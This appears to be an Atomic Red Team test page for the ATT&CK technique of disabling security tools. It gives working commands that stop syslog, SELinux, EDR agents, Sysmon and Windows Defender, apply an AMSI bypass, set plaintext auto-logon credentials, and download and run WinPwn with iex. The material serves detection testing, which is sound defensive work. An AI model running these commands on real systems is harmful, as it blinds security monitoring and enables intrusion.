Try it using Invoke-Atomic

Impair Defenses: Disable or Modify Tools

Description from ATT&CK

Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information.

Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to Indicator Blocking, adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/

Atomic Tests

Atomic Test #1 - Disable syslog

Disables syslog collection

Supported Platforms: linux

auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8

Inputs:

Name Description Type Default Value      
package_checker Package checking command for linux. String (rpm -q rsyslog 2>&1 >/dev/null)   (dpkg -s rsyslog grep -q installed)
package_installer Package installer command for linux. Default yum String (which yum && yum -y install epel-release rsyslog)   (which apt-get && apt-get install -y rsyslog)  
flavor_command Command to disable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog String systemctl stop rsyslog ; systemctl disable rsyslog      
cleanup_command Command to enable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog start ; chkconfig rsyslog on String systemctl start rsyslog ; systemctl enable rsyslog      

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
#{flavor_command}

Cleanup Commands:

1
2
#{cleanup_command}

Dependencies: Run with sh!

Description: Package with rsyslog must be on system

Check Prereq Commands:

1
2
if #{package_checker} > /dev/null; then exit 0; else exit 1; fi

Get Prereq Commands:

1
2
sudo #{package_installer} 

Atomic Test #2 - Disable Cb Response

Disable the Cb Response service

Supported Platforms: linux

auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8

Inputs:

None

Attack Commands: Run with sh!

1
2
3
4
5
6
7
8
9
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
  service cbdaemon stop
  chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
  systemctl stop cbdaemon
  systemctl disable cbdaemon
fi

Atomic Test #3 - Disable SELinux

Disables SELinux enforcement

Supported Platforms: linux

auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
setenforce 0

Cleanup Commands:

1
2
setenforce 1

Atomic Test #4 - Stop Crowdstrike Falcon on Linux

Stop and disable Crowdstrike Falcon on Linux

Supported Platforms: linux

auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3
sudo systemctl stop falcon-sensor.service
sudo systemctl disable falcon-sensor.service

Cleanup Commands:

1
2
3
sudo systemctl enable falcon-sensor.service
sudo systemctl start falcon-sensor.service

Atomic Test #5 - Disable Carbon Black Response

Disables Carbon Black Response

Supported Platforms: macos

auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist

Cleanup Commands:

1
2
3
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist

Atomic Test #6 - Disable LittleSnitch

Disables LittleSnitch

Supported Platforms: macos

auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist

Cleanup Commands:

1
2
sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist

Atomic Test #7 - Disable OpenDNS Umbrella

Disables OpenDNS Umbrella

Supported Platforms: macos

auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist

Cleanup Commands:

1
2
sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist

Atomic Test #8 - Disable macOS Gatekeeper

Disables macOS Gatekeeper

Supported Platforms: macos

auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
sudo spctl --master-disable

Cleanup Commands:

1
2
sudo spctl --master-enable

Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS

Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS

Supported Platforms: macos

auto_generated_guid: b3e7510c-2d4c-4249-a33f-591a2bc83eef

Inputs:

Name Description Type Default Value
falcond_plist The path of the Crowdstrike Falcon plist file Path /Library/LaunchDaemons/com.crowdstrike.falcond.plist
userdaemon_plist The path of the Crowdstrike Userdaemon plist file Path /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3
sudo launchctl unload #{falcond_plist}
sudo launchctl unload #{userdaemon_plist}

Cleanup Commands:

1
2
3
sudo launchctl load -w #{falcond_plist}
sudo launchctl load -w #{userdaemon_plist}

Atomic Test #10 - Unload Sysmon Filter Driver

Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".

Supported Platforms: windows

auto_generated_guid: 811b3e76-c41b-430c-ac0d-e2380bfaa164

Inputs:

Name Description Type Default Value
sysmon_driver The name of the Sysmon filter driver (this can change from the default) String SysmonDrv

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
fltmc.exe unload #{sysmon_driver}

Cleanup Commands:

1
2
3
4
5
sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
%temp%\Sysmon\sysmon.exe -u > nul 2>&1
%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1

Dependencies: Run with powershell!

Description: Sysmon must be downloaded

Check Prereq Commands:

1
2
if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }

Get Prereq Commands:

1
2
3
4
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
Remove-Item $env:TEMP\Sysmon.zip -Force

Description: sysmon must be Installed

Check Prereq Commands:

1
2
if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }

Get Prereq Commands:

1
2
3
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}

Description: sysmon filter must be loaded

Check Prereq Commands:

1
2
if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }

Get Prereq Commands:

1
2
3
sysmon -u
sysmon -accepteula -i

Atomic Test #11 - Uninstall Sysmon

Uninstall Sysinternals Sysmon for Defense Evasion

Supported Platforms: windows

auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc

Inputs:

Name Description Type Default Value
sysmon_exe The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) Path PathToAtomicsFolder\T1562.001\bin\sysmon.exe

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
sysmon -u

Cleanup Commands:

1
2
sysmon -i -accepteula >nul 2>&1

Dependencies: Run with powershell!

Description: Sysmon executable must be available

Check Prereq Commands:

1
2
if(cmd /c where sysmon) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3
4
5
6
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}

Description: Sysmon must be installed

Check Prereq Commands:

1
2
if(cmd /c sc query sysmon) { exit 0} else { exit 1}

Get Prereq Commands:

1
2
cmd /c sysmon -i -accepteula

Atomic Test #12 - AMSI Bypass - AMSI InitFailed

Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed.

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

Supported Platforms: windows

auto_generated_guid: 695eed40-e949-40e5-b306-b4031e4154bd

Inputs:

None

Attack Commands: Run with powershell!

1
2
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Cleanup Commands:

1
2
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)

Atomic Test #13 - AMSI Bypass - Remove AMSI Provider Reg Key

With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.

Supported Platforms: windows

auto_generated_guid: 13f09b91-c953-438e-845b-b585e51cac9b

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse

Cleanup Commands:

1
2
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null

Atomic Test #14 - Disable Arbitrary Security Windows Service

With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService"

Supported Platforms: windows

auto_generated_guid: a1230893-56ac-4c81-b644-2108e982f8f5

Inputs:

Name Description Type Default Value
service_name The name of the service to stop String McAfeeDLPAgentService

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
3
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled

Cleanup Commands:

1
2
3
sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1

Atomic Test #15 - Tamper with Windows Defender ATP PowerShell

Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings.

Supported Platforms: windows

auto_generated_guid: 6b8df440-51ec-4d53-bf83-899591c9b5d7

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
4
5
Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1

Cleanup Commands:

1
2
3
4
5
Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0

Atomic Test #16 - Tamper with Windows Defender Command Prompt

Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed.

Supported Platforms: windows

auto_generated_guid: aa875ed4-8935-47e2-b2c5-6ec00ab220d2

Inputs:

None

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
3
4
sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend

Cleanup Commands:

1
2
3
sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1

Atomic Test #17 - Tamper with Windows Defender Registry

Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info.

Supported Platforms: windows

auto_generated_guid: 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1

Cleanup Commands:

1
2
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0

Atomic Test #18 - Disable Microsoft Office Security Features

Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document.

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

Supported Platforms: windows

auto_generated_guid: 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
4
5
6
7
8
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"

Cleanup Commands:

1
2
3
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore

Atomic Test #19 - Remove Windows Defender Definition Files

Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed.

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

Supported Platforms: windows

auto_generated_guid: 3d47daaa-2f56-43e0-94cc-caf5d8d52a68

Inputs:

None

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Atomic Test #20 - Stop and Remove Arbitrary Security Windows Service

Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.

Supported Platforms: windows

auto_generated_guid: ae753dda-0f15-4af6-a168-b9ba16143143

Inputs:

Name Description Type Default Value
service_name The name of the service to remove String McAfeeDLPAgentService

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
Stop-Service -Name #{service_name}
Remove-Service -Name #{service_name}

Atomic Test #21 - Uninstall Crowdstrike Falcon on Windows

Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.

Supported Platforms: windows

auto_generated_guid: b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297

Inputs:

Name Description Type Default Value
falcond_path The Crowdstrike Windows Sensor path. The Guid always changes. Path C:\ProgramData\Package Cache{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}

Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Folder

Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath

Supported Platforms: windows

auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed

Inputs:

Name Description Type Default Value
excluded_folder This folder will be excluded from scanning Path C:\Temp

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
$excludedpath= "#{excluded_folder}"
Add-MpPreference -ExclusionPath $excludedpath

Cleanup Commands:

1
2
3
$excludedpath= "#{excluded_folder}"
Remove-MpPreference -ExclusionPath $excludedpath

Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Extension

Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension.

Supported Platforms: windows

auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea

Inputs:

Name Description Type Default Value
excluded_exts A list of extension to exclude from scanning String .exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
$excludedExts= "#{excluded_exts}"
Add-MpPreference -ExclusionExtension  $excludedExts

Cleanup Commands:

1
2
3
$excludedExts= "#{excluded_exts}"
Remove-MpPreference -ExclusionExtension  $excludedExts -ErrorAction Ignore

Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process

Malware can exclude specific processes from being scanned and evading detection. Upon successful execution, the process(es) should be on the list of excluded processes. To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess."

Supported Platforms: windows

auto_generated_guid: a123ce6a-3916-45d6-ba9c-7d4081315c27

Inputs:

Name Description Type Default Value
excluded_process A list of processes to exclude from scanning String outlook.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
$excludedProcess = "#{excluded_process}"
Add-MpPreference -ExclusionProcess $excludedProcess

Cleanup Commands:

1
2
3
$excludedProcess = "#{excluded_process}"
Remove-MpPreference -ExclusionProcess  $excludedProcess

Atomic Test #25 - office-365-Disable-AntiPhishRule

Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.

Supported Platforms: office-365

auto_generated_guid: b9bbae2c-2ba6-4cf3-b452-8e8f908696f3

Inputs:

Name Description Type Default Value
username office-365 username String None
password office-365 password String None

Attack Commands: Run with powershell!

1
2
3
4
5
6
7
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule

Cleanup Commands:

1
2
3
4
5
6
7
8
9
if("#{password}" -ne "") {
$secure_pwd = ("#{password}" + "") | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
} 

Dependencies: Run with powershell!

Description: ExchangeOnlineManagement PowerShell module must be installed

Check Prereq Commands:

1
2
3
4
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}

Get Prereq Commands:

1
2
3
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement

Atomic Test #26 - Disable Windows Defender with DISM

The following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed. This method will remove Defender and it's package.

Supported Platforms: windows

auto_generated_guid: 871438ac-7d6e-432a-b27d-3e7db69faf58

Inputs:

None

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet

Atomic Test #27 - Disable Defender with Defender Control

Attempting to use Defender Control software to disable Windows Defender. Upon successful execution, Windows Defender will be turned off.

Supported Platforms: windows

auto_generated_guid: 178136d8-2778-4d7a-81f3-d517053a4fd6

Inputs:

Name Description Type Default Value
DefenderID Defender ID that is used as a sort of passcode to disable it within Defender Control from the command line. The machine-specific Defender ID can be obtained within Defender Control by going to menu, command line info, and then retrieving the 4 character passcode to continue (listed after defendercontrol /d /id in the command line info window). String FFFF
DefenderControlExe Path to Defender Control software version 1.6. String $env:temp\DefenderControl\DefenderControl\DefenderControl.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
cmd /c #{DefenderControlExe} /D #{DefenderID} | Out-Null

Cleanup Commands:

1
2
cmd /c #{DefenderControlExe} /E | Out-Null

Dependencies: Run with powershell!

Description: Defender Control must be installed on the machine.

Check Prereq Commands:

1
2
if (Test-Path #{DefenderControlExe}) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3
Start-BitsTransfer -Source "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -Destination "$env:temp\defendercontrol.zip" -dynamic
expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$env:temp\DefenderControl"

Atomic Test #28 - Disable Defender Using NirSoft AdvancedRun

Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign. See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3 Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk.

Supported Platforms: windows

auto_generated_guid: 81ce22fd-9612-4154-918e-8a1f285d214d

Inputs:

Name Description Type Default Value
AdvancedRun_Location Path of Advanced Run executable Path $env:temp\AdvancedRun.exe
delete_defender_folder Set to 1 to also delete the Windows Defender folder Integer 0

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
4
5
6
Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
if(#{delete_defender_folder}){
  $CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
  Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
}

Cleanup Commands:

1
2
Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}

Dependencies: Run with powershell!

Description: Advancedrun.exe must exist at #{AdvancedRun_Location}

Check Prereq Commands:

1
2
if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3
Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip"
Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force

Atomic Test #29 - Kill antimalware protected processes using Backstab

Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill. https://github.com/Yaxser/Backstab

Supported Platforms: windows

auto_generated_guid: 24a12b91-05a7-4deb-8d7f-035fa98591bc

Inputs:

Name Description Type Default Value
process_name Name of the protected process you want to kill/terminate. string MsMpEng.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
& $env:temp\Backstab64.exe -k -n #{process_name}

Dependencies: Run with powershell!

Description: Backstab64.exe should exist in %temp% Check Prereq Commands:

1
if (Test-Path $env:temp\Backstab64.exe) {exit 0} else {exit 1}

Get Prereq Commands:

1
Start-BitsTransfer -Source "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -Destination "$env:temp\Backstab64.exe" -dynamic

Atomic Test #30 - WinPwn - Kill the event log services for stealth

Kill the event log services for stealth via function of WinPwn

Supported Platforms: windows

auto_generated_guid: 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
inv-phantom -consoleoutput -noninteractive  

Atomic Test #31 - Tamper with Windows Defender ATP using Aliases - PowerShell

Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled in Windows settings.

Supported Platforms: windows

auto_generated_guid: c531aa6e-9c97-4b29-afee-9b7be6fc8a64

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
4
5
Set-MpPreference -drtm $True
Set-MpPreference -dbm $True
Set-MpPreference -dscrptsc $True
Set-MpPreference -dbaf $True

Cleanup Commands:

1
2
3
4
5
Set-MpPreference -drtm 0
Set-MpPreference -dbm 0
Set-MpPreference -dscrptsc 0
Set-MpPreference -dbaf 0

Atomic Test #32 - LockBit Black - Disable Privacy Settings Experience Using Registry -cmd

LockBit Black - Disable Privacy Settings Experience Using Registry

Supported Platforms: windows

auto_generated_guid: d6d22332-d07d-498f-aea0-6139ecb7850e

Inputs:

None

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /t REG_DWORD /d 1 /f

Cleanup Commands:

1
2
reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1

Atomic Test #33 - LockBit Black - Use Registry Editor to turn on automatic logon -cmd

LockBit Black - Use Registry Editor to turn on automatic logon

Supported Platforms: windows

auto_generated_guid: 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70

Inputs:

None

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
3
4
5
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Administrator /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /t REG_SZ /d contoso.com /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d password1 /f

Cleanup Commands:

1
2
3
4
5
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >nul 2>&1

Atomic Test #34 - LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell

LockBit Black - Disable Privacy Settings Experience Using Registry

Supported Platforms: windows

auto_generated_guid: d8c57eaa-497a-4a08-961e-bd5efd7c9374

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
New-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -PropertyType DWord -Value 0 -Force

Cleanup Commands:

1
2
Remove-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -Force -ErrorAction Ignore

Atomic Test #35 - Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell

Lockbit Black - Use Registry Editor to turn on automatic logon

Supported Platforms: windows

auto_generated_guid: 5e27f36d-5132-4537-b43b-413b0d5eec9a

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
4
5
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Value Administrator -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Value contoso.com -Force
